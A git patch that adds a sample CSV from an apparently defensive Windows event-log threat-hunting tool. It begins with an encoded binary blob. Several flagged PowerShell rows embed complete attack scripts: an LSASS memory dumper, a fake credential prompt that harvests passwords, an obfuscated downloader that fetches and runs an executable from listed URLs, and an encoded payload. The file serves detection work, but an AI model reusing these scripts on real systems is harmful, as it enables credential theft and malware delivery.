zom6fq+?F777lyMT?>&oge}*3tT)z?L_zm2~xqtjWjhzKlThG?$ad#=SSc|)tLa|cZ z3GVLhF2&uoxE3e`DO#N3F2&tFxa&)Mzx(}fds*+jWMwjIlKne#=Ipa)kDM9I5q>^5 zLVO}SQRhy;_L?<@LT;^)YOEUB?jt0Q6xInd%~G|PFpws<6OglZ$euJ2a9p;JuwW znFR>(?Q}bRG2uo2BVto2TKb|=z0(}CMEKtkFE>?C2@i{}D#)SRe3PCEN52L=e9~M? zdBJEE$gFlE)U0{Y-=dUR{$L+zp2fmXASd{5(f?&U8(9Y*#Y;dH)REsH@c$=KsUA_{ zC9Vn_g_jh|44s5p=T($A71XU6-l`_nLzR&Hm>fW(ZdNl#Qevd2VC?3dU%OJ*y;#ot zljTx<`ojKuH?J0BBZFv)3SII*W?8tq+Mc}43sD}RNTs8W(f9c|X&br+qzz?<6XpWi5)izT0J!=g zow*bK2CfWm{;3Q#?y(W@9$BeCEe)~kk};X5piO^zIAXBPX0`i0KEUnVWCrk>MZynI z<7VtgJ2d6NRiS#2NuaNyhwZ=}UM6=%#bhb36lUPbl?)ghXq8qLi$A4W9~rZKw609w z!u?sUqR!G`v-l+wHw4yABX9t{JXsw3#?_70heeCzEHxCb57OOZ8iB#s;aAUm-@?6k zkAn%tIBb$|S$DgwW)$UvGxL2cu^F5{FNs-|>0~!jiK4}WGo|$R{O>u}@4K>Rp~qM} zc!_0x2whAxp5r$yvLXyz5d_&jp6btl>KgpB>x@3(9U*6{(ocKnGXQ~4h8F|kKD0X~ zN6RiYe8G8@Pj7cFHItJh^$J#K-}KPPzJRv9xKqk=uGQ2jPNvJN+G+2uoLzY8nnUc7 zDW7BIFo|EP=iUjVdKlx}@xN~habKL$_mj209b<;+uDezh2~1>|C4z0%K4;L5qRKe) z=ECj5%G- zyDYxohx0Hso7GxEvxMsFT1=6l}>moOHVl{F( zyTU`2NJ4hI0GWei1zZlCJ=kATAvEbsEFXJk5Q+GowOG&|=L3I&t5qw54#psstfYBX z_q4E5%VCgUlDeFV!bhc;A&pnf&8n#jOPZHnb&F_s1p5U#R%&)G5kJ3>n$c$YG3k-{ z`K8g6Hf!&mY3jI0u2&<^4cMQU)@t(34*>fDsFf>CY@FiKzAWXdg1)$E584lSxhRIz zbRDfP#8J+6SxMqX1aG*TF4q340#|@d+CUJx4Q1W1aTcEIJZ%7Q1fYj9K+wR(z*)XP zt0nsZKe7xyp0eW7VkV^P*P>T%757T0VUSHav zb1t?$LK@Q|eWG~sB21-B$x}Av>nZ*E+nG0mc$y04CHR#=m=^zkL18%9YA~t-75b&<2=eeibfyk)!_qh;(&y!3UbJg9qzjKi>V%V10$h#~G;?9ObLoSVjK~ z)_0l;RB=xf>&FI;5g$lZa&~^!XI^bPG(`O>DW6=#=x4fhOKcJb)N{bN-MKE6$-<~T zt%m>^q+>XL+IUsY8EL(@sI9si*pBgqy_wg>-@6Vws@uhC^hRLZw&nYa4HHzEb|6jl z+oR%jC#>kQ$IQ5&0N&vIJ9m}y252=g}O;Nclk?-<0n#= zU9-(cRfdWT`1e0!PE&~9X?ozK4 zl1$uJH`=okm5f^36ebX{NNlS6*D#JN5+)AV7Z^c65+4=u_I9zD;Et@>XbRAhJ)tl&ASBN=}&PB+CSu(Uy5q`bh<1>@bgxr zvA84*ltpz5B@7T-cXyH>uAAp;{-kVpH8y!osuj7$q8VBKi1ps_ZEgvsR^*PkkP6wa z-$D*QIKt<0V=Vgapb5FWZh#&m`gal=D_QqFE3C=h?gwJohg_GBLBC@4X*y6>jq48I^k+B;#H9y&3*_iiyDpyYr~V4 zf*+eC@zyv$nG%wUv8YVEBj8OnzBjrxd^1MUy{#>d*v%#pf6llm6jIbr+JH(a2TI?4 zEJiI6hQqdK-m?Yil`G3ikllU$rOVU7T6I!s%lr*C^p~E&lVB=2;(2arw5~R`X8&x~ zG^%YPuzz3`ihb=9%cghzs3wYgFdA%!LOEOa-WtwacWLc<@Q#8q&zY<)>j>3ZA_nBv zc#C3bcT%&z|K#Rn=XRPCTfS6$7N-TXK4Q12yz5R`SSEThVH-rt_H|Gc@Y%{g21}0u z>iz|ad7}?|kYayDFyOOFv>CF4X5!5s{YIPE%(G{X& z;l?P8CFSu@O*xXlQ)IZR;&@O9w#*7iL^%?O*dytK&^nad)udnYb1r8tw=!|OX8&f#eQtB#ob#473U1n8yY2~g zi+_-OE~F*kL7nNo!TEON^k7T}BvSOv13etW(Dv?^RWYymVb9c}Y3A$xSb1?D7?VvQ z5I)}UY4;8R(TD_YlY<`jET`8Fdpal8hv)6`LBUo}ENOJ%Harm-iP(UPuu7JeaJ(KJ zeY&P4t*5+}m;1}8+$9xN-b1HBt9O%h_v!qikZ)RXXfY2yC#}=17coCB5aC+;PnpE1 z1ok1oNI=$KZ>qJ^q2$`MvGWHvYwO`JiL7H}w%c2I(G036u3Egiugyv3W;dy^rbs=X z3-o4ZWEZ?XsD3I5r1ygS$V$8w7=Xeap)laslr799){Ax#VGW;&Qi|z|km|RmMPbMq zbyRdZMlALI%OllgV$^uvSIFGhvp5{#;_AvflBEQ4y-4HGZolPMF0FoTw&O$PfGnl^ zZ=(HnNys00T7T>jUp%D7=4&PflvSHk>6shR?kyfheYR3dw86V!-BQzzPIz6*yy>B9 zebC0L{Qk3~(1-}Cs(=+|#8iRPeKo5_1`Z!<;|ALeX8|Y+;^F&XsN06PN6s$Qa>4YZ z@NpgkFJ?*7KU=x<5)Vz<|C&M0=tOPDtZQ=NzLpss5$~}DSyjprBy=O ztb227WAJ#KVxTIr89aZ30 znIvUu?c5KOD!7!7%oAyRMyoo4;*w#Quo&~-K1m3fX%PYwx2qB6Wxi_lgV$A>E8y`D zohjg9>D;1~)e?)S?N*O1Z2ENi4PkzCylJzTk#;z{=Vk!f9~PS2#!U@pftJxB(Pdja zyiKfrmPbbhk~$Jj09mL9qB_#{`tAMhvT;eV94fcoa_F%gju#CKFy#sEUA9$JcVJca z6>7EMXz1K3=gy@_p!_Nlx#8fHcjhAsax2c`D>{hde3pnu%yUT}er_jEH=N6$c<&R+ zgQqHz^I<@URmF7e<0i#}8Z#4=M$YplC8VWk#?wi(*~we{Dlt zRJw%!c<9Rr9pQ56>bMAzp{0fXrP0Qb7w#WE7Q8oO~d!x5~Hl#xTj?soiSb6 zb(3@HLS?kFELlAl+E8C#p`iLW2XM^Kv6Q8g$?o0Sa{KTV!0kVc&H;VY_%17c{fW=i z%S;GRe(qDY^q4gU!71dvFgsT-xVlkPm&@n*g#_)2$a|$|`a~?UEUn8Y0`BNCvsX!C z=?Mb+im0MDtDH8O3a{ca^nNpC<2xU%o87`x30eHR)}{&RnnWO^-S7vzyZbx>SmCEE zjpoutC+0G^u+ORd49VS48jgb%0J`X*dZHtSh=0!({R;U?&mo*|0Uy8s$Ak@L;tRxQ{^ zXe_&% zIC1kgSth{VmU~-(!O2ar?no&@98Z&7oabfnfdxO_TV?lDwaUlc>iH+EY1@yMF!BeK z>X^D2HjI9kpyh>Dfi_!d{Ll-PtHPt+1(wn?`*l~!Yf9`ZloubD42nD zU7nY?=~=ws$%7Vy<<03wEt(g`+@y^M^vV|R^=9YYl==FEOfT7~l*-%&&%7n3(LCGj zCbN`NPMn4lrhaM-pG97gMxP5!-Fwml0WR#RMy6(u zQ^+HsFBWB&GNrjmA336@#~fiD)NYkig8(>aYoU)=odgZuI#8Rzpa%sCu)`70pt?7c z1d2atjJh-wt+(27?RXKo&Z4zCYv@(RRGqPImxYV0`yp#DIuXwwS|TT`<8Ym!Heea#-CP7?3HK!1rE8EtL%zLGVXA%02j zw_CH9-JQ&7g1Z_l5z|_4xCuJBtc%syLNY{+O&n58e9ZiLQ8GMUTexfp}Om#Xh^9?al249FQIqRVw8L+g{llI3{t8mbGT}wbry>aP=(dUb2yG=+Xks(;<-31N@)!hI zMA4SoMr%igVdC(`gGXNyMaE;$thOEdA^fih8-r%@#wPKLL$n*BUx`KbhAlo&W{iMpxFaZHE~kZCH-8L=}0c`UFyMXr`xK>Y}Nhu zxvEg|{HqERY#06m!x5y9)aCIFDkT=o+NG~EZTfX*l`Y~DET*pL2tl(dMkD%;Tq4P> zwL7PTSE7sa2}38S>_+G&{lAk99B(9#n@#f22r7``f$!fapO97}!BAqPd=S0!{e<|X zVDt)+LRPb(2Aes@d}2Cog14O(EhYQy2-2QM!epXO@~a4iptjBuC`$5zh|sUcra*e0 zoPjAim4G8VErV+7m;5PtMAty}4Kqk=Df?I;q7@>=a*~RZNdgpf|1?y8T@)y(;?$KG z-CrHUvAvaZVXY!GLg%|txVEblS}-L`!_k<8$khX&)X?Q{0tfsM@KF}w@L>$W;U~&+ z%~oD~>7_!W)3seQ9^Qxih{YaG-pFA$cKeg_^9*N3ciS=lJNrSUYUwc!;rVlnTAE2= z@wQ+4pigpZ?gZBET6~i}Szycb@J`&$93vL?z!~ASsT9hp@4;mNR10O5P^5Y~ayqb| zz(~upi$~kUea+2=D;k_L@5&o+b$l7knD;hpYUk3SyL^F9Se9n4&@?O8 zE9?>+AvpM{TD7f=*nL?m8z^vx1Ntd_Sv;1MWY&BT>yFC7VDz?JD&m+NJMr83%RDFV z*LMkcHQwrs3PYQ`KirUJH7WX{g&J3 zE*77N@5GDXeV&`m+dvH7?Dynurw0CPtL=D7vuIZ512(R-B0FGANErKKHm#^)l$~mi z7|_fUyNL8Fouv@x+0A#BvFt;Xb%6v|}8A`BtY0*|l+w8RsylW{sZy06{qF@hTsJxw$ zzW$<4LRlxx?35?7%IJ<0g1{ zWSCzYS7yYA_o?F6otAoz|C6gj;%?`P#k7r zYBDzh34@LjuO5SSEG(GZ-{~%wN4l*%V zm)YH8OnM?~Uu-$?)9p~7^r_L3$VHwVC&JwKJKMCzow`2iUX9wteGuyba~#8p-$hc@&#+{)`O8Q)P%Keqz*CZJ+gJxJIvyS`U_ccclRhGnD)0=|w$P zKW#c2H6Kmq{&QxV8$FNFJtv2&Iy>0CajTTN>tc-t5?T9b;mrcTMVk1eE|cKh>^KTk03k#bPLL`rWfdVnH>bl~Q(iD*`yGy#M=v ziEF)!lIw@ixw=}+gb-jNYJrf(4hzMUyfJ-DP7vJ?D%;+$vY=jHLhQKfG0VW`tryy+ zs5LY>AL8N|99GmBR_T=G^mve-lE$6d4PFFkD6D5L8C0yEnLlCXxkUbJ?8*rQ$C}Ev z%h#I&EoARLGUvh=Pbk=3YYEpFxOZ8;xofKLz8od8?sNAfCkYLM0|5bn0RHepn3VP0%%oGOWwe&97Q?g>Cgj}{-0Fx{b_JqQoi2IR{Xd~wH) zuBx4P980-koy|S4#eP>WiGVx>jIcV+zDhJG8llK&z4DQ7_|$-*0?$h+pLwN1 zoSQF6I{+eFPaCAL))4-_@X$3zS2u{K7=-AG)fl)WR@NJ#5qAAt`Oe15@LL0NOczE0P#yAn$+60TcI zvRm&B-ndvP=f%7}r;8&sVY4z1($d9k5m!-)$y;S0ph%w@^0U5_T?zqsX#-ljX50Mc z4oDtlzM$v$gI4LDApg`7{96&l3b2OA6F@*<|4U08O^vLKn0|*WzjOtpCLKL5gx_*T zC(=?Eh0Q%wmI~yU%?||CmMm5m^@Q?P7QXZ-{oH5mAPB-lL{~`YArL5R|Dwdhn{Otg;sSvkrU9%Z z=A3U^PaB7^bF;F=9Ltx`KrBM&>G?d&3&dB3^g!UtGh+X8p+3tFleN(iiai`I4t(y} z==6R@>>Y%vT3CB1Z=Toa34!=YNY>Rr^~cHsV98~ANHK2pD=q$~1V;)1=CW-^Qo>=x zjFv__Ba`7)?PHzp3-@O0kSny(QcHP4164&F+sI8>?0E!Teb~?vAI&RM4xa=>hLo z2afoj_S0lXvt(PnZmuQSwD+!;z3AeOnf|_W+0YdxE6K5 zvr}R%lJ@L;>d{RTfOr{p20$T|qQl{Y%7>g$0KmFhgndSwextO#h&u`))wUmhhpUB7 z#sZjtScqIhvW<3_TK!= zSie;;>Z=$v!k`pAVoCkU`%G#=g16l)KV#ojhDk{f%LMA!)hlA`#xO^@L&lB^IcP}H z?H%gx2z6H+RhnrEBMJ9VZb%P)k6Kt=w+>jJC}NW)CA!NY6b#d^9!UfsY6D{|QSI9L z`fZmBgfhxYk4BkUsl=R3Nc+pQc3WAbht0bqKECr_jxag4a%KN4vF3=Z9e78=u|&ip zeu=nod)IQ;a?}zIUICb)eBKHVb!uvREnTO{UW^#fjW(GOo5pH0gq47HTk)C6KKDi{ zQ^Zy+tYqb*@0kU8{cXzE9p)c2A$InNIrM75SOuCt#M{*SxcOz|nfaE_j7>g#FsSMA z*Kf?pLfy7JRibthh>U1&`0+|*NhU=BVme{V)!1z5^SI?unj9*E3A|6C8k3M^kVE9HXe2J}xxVE$ zeC)|iRJo$xSg*E<)Q$5S;Dq&NwfK+{C_aCxWY%vHepB7PRqbd_hgudQ7O2RrDgvwI zZE?9ruC}9dwJ?Z|XYeV909YuTw|O6~K2s+NMPuFp zy_m(7LmY{?wS1HPagp`pYod;F`>qPRk&|wcNd1901H&aOPiy9WOga0-0d7NU4oxI7 zdzXicbRR2T_moHsNs%rJ2EGy3Ty4D^W-w!d$ixvcKB2u@HlE+NUd4~}9?R*w5>YR_ zN>%{u-I9Q!_H z0h#^6Zuab#y;ngGPsbbUWhtJ+#ON>l7S0Aq%cjn2MBBUPi*1KRtrjiq7B%hwX+Kt> zjdVuqi;rjZTZoRKL-}_lvm<(*}jeeQ;jJN^w4rUDDs|TdKW`+UZain?Q zTEoc?IW!E5h-Psi>geP(GLJ2%WHM0NMqCXp!wWAJ8PUIrKeoAPzoTo*bk|x{Ige==c>A?Zl^;EPEuL5`=FD!uNw)l1u1i=5v4D#c8V&*i<3Ed3&(`*Li7GDJ%z>S&WgWfEW|&cS zV50aWqy`o4ThdWJWo`R6FQSNU(s3@QkFX>VEE02Wc0I3d?iXdf8wYSp+H%?5*COEr zqkW^KNiU4ofGW%7E$%28qoHyl9i8*g?se@{#Oey4oUmeI;Ulq`9LnlXydv0oVbOX^ z`{G`uA&aUso=B(m;~P^lI*bmJpa<)C&Tx$)lB)>sk8-;<6)!x!mzL5z>nNOTdF=z) zN{2*Yuu9#l`^LaxG(T#{g@yXiB{H2*7$aG^!Hapr`>H=rl{zJE{WUIb2Oh1U%Sl2);Xwc6x`$mC{!9ShvovV`a>~Fu z_WSk8_t%$(ppCVok+q|aqMNOegVryN`x|hYB|f(c{;MQdOObzz{ww(8+Xcqz*c(|o zFfslL{}v3#Fa}>-y>M#%RwGM^;o6=D7EalyE6nx;6y)T$j z_FohW;IkCY=O`zdtC@pf3J$m_^5-=oEq|86^&F*(&nI^toDU%QR(kn|){$2}OJQMt z4ujsp{n;6u8ACAYPYg%R^O$F~S4+?e!}EX2_fO1v?emyt)i=IX6ylW1i}*Ljr}=rz zvno6moGI%9#?&JHjlpPp9`mdYPb=ij1HdQc^Bx1^ORaT+{u(n15T}zfC42VdnS~7Zk)}{Tqm170SO~pL~V; zehWL8>e(9^DmdDkS)2Us3i_MycfZj;1ZQaIUnc6GUZlT8|L#oqM>HMwx9Hzp3x5Ot zc2@rZcp*dox9j@1_}`A%KjNb({~`WAZkn7VEVzUrAPB*4XLtw*CUo$v0r7tTLBhYL literal 0 HcmV?d00001 -- 2.34.1 From d796e57b19758ab31c439c7404ceb69b809c6491 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:44:02 +0800 Subject: [PATCH 08/13] ADD file via upload --- source/samples/Sample_TimeSketch.csv | 41690 +++++++++++++++++++++++++ 1 file changed, 41690 insertions(+) create mode 100644 source/samples/Sample_TimeSketch.csv diff --git a/source/samples/Sample_TimeSketch.csv b/source/samples/Sample_TimeSketch.csv new file mode 100644 index 0000000..3d75da3 --- /dev/null +++ b/source/samples/Sample_TimeSketch.csv @@ -0,0 +1,41690 @@ +message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel +powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 971 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + function Memory($path) +{ + + + $Process = Get-Process lsass + $DumpFilePath = $path + + $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') + $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') + $Flags = [Reflection.BindingFlags] 'NonPublic, Static' + $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) + $MiniDumpWithFullMemory = [UInt32] 2 + + + # + $ProcessId = $Process.Id + $ProcessName = $Process.Name + $ProcessHandle = $Process.Handle + $ProcessFileName = "$($ProcessName).dmp" + + $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName + + $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) + + $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, + $ProcessId, + $FileStream.SafeFileHandle, + $MiniDumpWithFullMemory, + [IntPtr]::Zero, + [IntPtr]::Zero, + [IntPtr]::Zero)) + + $FileStream.Close() + + if (-not $Result) + { + $Exception = New-Object ComponentModel.Win32Exception + $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" + + # Remove any partially written dump files. For example, a partial dump will be written + # in the case when 32-bit PowerShell tries to dump a 64-bit process. + Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue + + throw $ExceptionMessage + } + else + { + "Memdump complete!" + } + +} + 27f08bda-c330-419f-b83b-eb5c0f699930 + C:\Users\Public\lsass_wer_ps.ps1 + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 1123 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + function Invoke-LoginPrompt{ +$cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","") +$username = "$env:username" +$domain = "$env:userdomain" +$full = "$domain" + "\" + "$username" +$password = $cred.GetNetworkCredential().password +Add-Type -assemblyname System.DirectoryServices.AccountManagement +$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) +while($DS.ValidateCredentials("$full","$password") -ne $True){ + $cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","") + $username = "$env:username" + $domain = "$env:userdomain" + $full = "$domain" + "\" + "$username" + $password = $cred.GetNetworkCredential().password + Add-Type -assemblyname System.DirectoryServices.AccountManagement + $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) + $DS.ValidateCredentials("$full", "$password") | out-null + } + $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password + $output + R{START_PROCESS} +} +Invoke-LoginPrompt + c7ca7056-b317-4fff-b796-05d8ef896dcd + + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104," + + + + + 4104 + 1 + 5 + 2 + 15 + 0x0 + + + 683 + + + + + Microsoft-Windows-PowerShell/Operational + DESKTOP-RIPCLIP + + + + + 1 + 1 + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0') + fdd51159-9602-40cb-839d-c31039ebbc3a + + +",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 1122 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + 37f6d110-cfdf-4118-8748-17638e258531 + + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164892 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 20:43:58.450 + 00247C92-858E-5F7B-0000-0010E741202B + 6636 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\windows\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-858E-5F7B-0000-00105241202B + 18404 + C:\Windows\System32\Taskmgr.exe + C:\windows\system32\taskmgr.exe + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 10272 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-02 14:48:51.664 + 365ABB72-0244-5CCB-0000-00109AE70B00 + 1508 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7.home + 49178 + + false + 151.101.36.133 + + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339891 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-02 16:24:28.637 + 747F3D96-E8BC-5F26-0000-0010F7C41A00 + 588 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E308-5F26-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-E8BA-5F26-0000-001035BE1A00 + 8104 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 564605 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-22 22:09:35.263 + 747F3D96-F41F-6081-0000-001078834A00 + 6644 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-6E1A-6082-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 624 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" ),1," + + + + + 